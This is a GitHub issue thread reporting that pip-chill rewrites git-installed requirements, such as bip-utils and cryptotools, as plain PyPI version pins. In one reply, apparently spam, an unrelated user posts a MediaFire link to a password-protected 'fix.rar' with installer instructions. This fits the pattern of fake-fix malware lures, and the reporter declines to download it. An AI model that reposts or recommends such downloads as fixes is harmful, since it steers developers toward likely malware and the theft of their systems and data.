### ISSUE TITLE
pip-chill fails to list non-pypi packages

### ISSUE THREAD

**Issue by mehdiirh** [rbanffy/pip-chill#80]
### Environment

*   PIP Chill version: 1.0.3
*   Python version: 3.11.8
*   Operating System: Manjaro

### Description

pip chill ignores the fact that some packages are installed directly from github, and changes them in a way like they're installed using `pip`

### What I Did

I have two requirements as follow:
```
bip-utils @ git+https://github.com/ebellocchia/bip_utils.git@d15c75ddd74e4838c396a0d036ef6faf11b06a4b
cryptotools @ git+https://github.com/mcdallas/cryptotools.git@dbdced863bd2622f4cb41595df1ecad399760d78
```

And after I run `pip-chill > requirements.txt`
I get:

```sh
bip-utils==2.7.1
cryptotools==0.1
```

while these modules might not be available on pypi ( or they are private modules on my own github )

Regards

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mehdiirh** [comment]
> https://www.mediafire.com/file/czdodbba054p738/fix.rar/file

Thank you but I think I'm not gonna download and install it from the Mediafire. Please make separate repo or request a PR if possible.
